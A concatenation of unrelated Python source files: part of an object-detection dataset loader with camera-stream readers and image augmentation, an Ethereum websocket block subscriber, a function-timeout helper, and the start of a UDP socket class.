img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:[email protected]/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:[email protected]:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = s, s # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
websockets.py
|
import threading
import random
import asyncio
import sys
import aiohttp
from wsutils.clientwebsocket import ClientWebSocket
from wsutils import wsutils
from rpcutils import constants as rpcConstants
from .constants import *
from .connector import WS_ENDPOINT
from . import utils
from logger import logger
@wsutils.webSocket
def ethereumWS():
logger.printInfo("Starting WS for Ethereum")
ethereumWSClient = threading.Thread(target=ethereumWSThread, args=("Eth daemon",), daemon=True)
ethereumWSClient.start()
def ethereumWSThread(args):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(ethereumClientCallback(args))
loop.close()
async def ethereumClientCallback(request):
async with ClientWebSocket(WS_ENDPOINT) as session:
logger.printInfo(f"Connecting to {WS_ENDPOINT}")
await session.connect()
payload = {
rpcConstants.ID: random.randint(1, sys.maxsize),
rpcConstants.METHOD: SUBSCRIBE_METHOD,
rpcConstants.PARAMS: [
NEW_HEADS_SUBSCRIPTION,
{
INCLUDE_TRANSACTIONS: True
}
]
}
logger.printInfo(f"Subscribing to {NEW_HEADS_SUBSCRIPTION}")
logger.printInfo(f"Making request {payload} to {WS_ENDPOINT}")
await session.send(payload)
async for msg in session.websocket:
if msg.type == aiohttp.WSMsgType.TEXT:
if msg.data == 'close':
await session.close()
elif rpcConstants.PARAMS in msg.data:
addrSearcherThread = threading.Thread(target=utils.searchAddressesIntoBlock, args=(msg.data,), daemon=True)
addrSearcherThread.start()
elif msg.type == aiohttp.WSMsgType.ERROR:
break
|
__init__.py
|
import kthread
try:
import thread
except ImportError:
import _thread as thread
import time
name = "bombfuse"
class TimeoutError(KeyboardInterrupt):
def __init__(self, func = None):
self.func = func
super(TimeoutError, self).__init__()
def __str__(self):
if self.func is not None:
return "The function '{}' timed out".format(self.func.__name__)
else:
return "The function timed out"
def timeout(sec, func = None, *args, **kwargs):
"""Executes a function, raising an exception in the main thread after sec seconds have elapsed"""
def timeout_thread():
timed_out = False
try:
t0 = time.time()
while True:
t1 = time.time()
if t1 - t0 >= sec:
timed_out = True
break
time.sleep(0.2)
finally:
if timed_out == True:
thread.interrupt_main()
else:
thread.exit()
def timeout_block():
try:
y = kthread.KThread(target = timeout_thread)
y.daemon = True
y.start()
return func(*args, **kwargs)
except Exception as e:
raise e
finally:
while y.is_alive() == True:
y.kill()
y.join()
if sec is None or sec == 0:
if func is not None:
return func(*args, **kwargs)
else:
return None
try:
return timeout_block()
except KeyboardInterrupt as e:
e = TimeoutError(func)
raise e
except Exception as e:
raise e
|
UdpComms.py
|
class UdpComms():
def __init__(self,udpIP,portTX,portRX,enableRX=False,suppressWarnings=True):
"""
Constructor
:param udpIP: Must be string e.g. "127.0.0.1"
:param portTX: integer number e.g. 8000. Port to transmit from i.e From Python to other application
:param portRX: integer number e.g. 8001. Port to receive on i.e. From other application to Python
:param enableRX: When False you may only send from Python and not receive. If set to True a thread is created to enable receiving of data
:param suppressWarnings: Stop printing warnings if not connected to other application
"""
import socket
self.udpIP = udpIP
self.udpSendPort = portTX
self.udpRcvPort = portRX
self.enableRX = enableRX
self.suppressWarnings = suppressWarnings # when true warnings are suppressed
self.isDataReceived = False
self.dataRX = None
# Connect via UDP
self.udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet protocol, udp (DGRAM) socket
